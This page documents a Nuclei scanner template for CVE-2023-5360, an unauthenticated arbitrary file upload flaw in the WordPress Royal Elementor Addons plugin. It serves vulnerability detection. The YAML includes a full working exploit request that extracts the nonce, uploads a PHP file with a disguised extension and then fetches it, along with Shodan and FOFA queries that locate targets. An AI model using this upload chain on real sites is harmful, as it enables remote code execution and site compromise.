WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
ID: CVE-2023-5360
Severity: critical
Author: theamanrawat
Tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
Description
Section titled “Description”Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79
YAML Source
Section titled “YAML Source”id: CVE-2023-5360
info: name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload author: theamanrawat severity: critical description: | Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79 remediation: Fixed in 1.3.79 reference: - https://wordpress.org/plugins/royal-elementor-addons/ - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/ - https://nvd.nist.gov/vuln/detail/CVE-2023-5360 - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34 - http://packetstormsecurity.com/files/175992/WordPress-Royal-Elementor-Addons-And-Templates-Remote-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-5360 cwe-id: CWE-434 epss-score: 0.96512 epss-percentile: 0.99596 cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:* metadata: verified: "true" max-request: 3 vendor: royal-elementor-addons product: royal_elementor_addons framework: wordpress shodan-query: http.html:/plugins/royal-elementor-addons/ fofa-query: body=/plugins/royal-elementor-addons/ publicwww-query: "/plugins/royal-elementor-addons/" tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusivevariables: file: "{{to_lower(rand_text_alpha(5))}}" string: "CVE-2023-5360"
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236
-----------------------------318949277012917151102295043236 Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p" Content-Type: image/png
<?php echo md5("{{string}}");unlink(__FILE__);?> -----------------------------318949277012917151102295043236 Content-Disposition: form-data; name="allowed_file_types"
ph$p -----------------------------318949277012917151102295043236 Content-Disposition: form-data; name="triggering_event"
click -----------------------------318949277012917151102295043236 Content-Disposition: form-data; name="wpr_addons_nonce"
{{nonce}} -----------------------------318949277012917151102295043236-- - | GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_3 words: - '{{md5(string)}}'
extractors: - type: regex name: nonce part: body_1 group: 1 regex: - 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"' internal: true
- type: regex name: filename part: body_2 group: 1 regex: - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php' internal: true# digest: 4a0a0047304502207026345615de71c3a227e64788ecc24047b81c29deb98710c628c5bbba56bb46022100ba470a1ce76efc6758529b7bdc408a5135e67d3a2b743853f723db43a3918c31:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-5360.yaml"